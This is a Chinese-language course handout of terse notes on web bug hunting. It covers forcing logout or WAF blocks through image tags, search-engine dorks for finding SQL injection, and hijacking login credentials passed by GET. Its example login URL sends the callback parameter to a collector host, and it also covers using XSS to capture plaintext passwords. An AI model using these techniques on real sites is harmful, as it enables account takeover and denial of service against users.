[关闭]
@1kbfree 2020-03-30T06:19:29.000000Z 字数 1506 阅读 627

课件三

未分类


  1. 3url退出|拒绝服务(不给你访问)漏洞
  2. 4、老套路:利用搜索语法来以洞挖洞
  3. 5、组合拳劫持用户凭证或密码
  4. 劫持get传递的凭证
  5. 利用xss获取用户明文密码(需交互)

0x1.

学过html的朋友都知道img标签是引入图片,然后后台会访问这个链接如

  1. <img src='http://www.freebuf.com/'>

那么这样的话就会后台自动访问http://www.freebuf.com/,如果是图片的话会直接显示出来,那么我们可以利用后台访问这个特点来进行一个利用。

https://fuckgo.github.io/2018/07/22/%E4%B8%80%E4%B8%AA%E6%9C%89%E8%B6%A3%E7%9A%84%E6%81%B6%E4%BD%9C%E5%89%A7/

0x2.

利用搜索引擎来挖洞,是一个技巧,是看运气的,不能保障有也不能保障没有。

  1. site:xxx.com inurl: xxx.php?id=23333333333
  2. site:xxx.com inurl: ooo.html?name=

0x3.

https://fuckgo.github.io/2018/12/18/%E6%9F%90%E5%8E%82%E5%9B%A0%E7%99%BB%E5%BD%95%E5%A4%84%E5%88%A9%E7%94%A8GET%E8%AF%B7%E6%B1%82%E4%BC%A0%E9%80%92%E7%9A%84%E5%8F%82%E6%95%B0%E8%80%8C%E9%80%A0%E6%88%90%E5%8F%AF%E5%8A%AB%E6%8C%81%E7%99%BB%E5%BD%95%E5%87%AD%E6%8D%AE/

https://fuckgo.github.io/2018/09/13/%E7%81%B5%E7%8A%80%E7%99%BB%E9%99%86%E5%A4%84%E5%8F%AF%E5%8A%AB%E6%8C%81%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E5%87%AD%E6%8D%AE/

笔记

  1. 访问页面
  2. 页面自动加载alert(1)
  3. waf 拦截
  4. 导致页面不能访问
  5. csrf + 修改头像地址为waf 拦截导致访问不了页面
  6. 访问页面
  7. 页面自动加载退出url
  8. 用户退出
  9. 登入
  10. 图片直接加载
  11. 用户退出
  12. http://abc.xxx.com/xxx.php?id=23333333333 -> sql注入
  13. site:xxx.com inurl:xxx.php?id=
  14. http://bbb.xxx.com/xxx.php?id=23333333333
  15. site:xxx.com inurl: ?name=
  16. 1、登录
  17. 2、然后会有一个xx.cb参数来鉴证凭证是否正确,如果正确说明登入成功
  18. https://passport.xxx.com/wauthen/login?xx.action=uilogin&xx.realm=cloud.lps.xxx.com&xx.uinfo=username,nickname,pid&xx.lang=zh_CN&xx.ctx=aHR0cDovL3RvbmdidS5sZW5vdm8uY29tL2NvbnRhY3QvY29udGFjdC9wb3J0YWwvaG9tZS5odG1s&xx.cb=http://127.0.0.1/jc.php&xx.source=tongbu.xxx.com&display=
  19. get传递密码或凭证,且没校验验证的地址
  20. xss漏洞,无法打到cookie,因为有httponly
  21. action=http://www.xx.xx/
添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注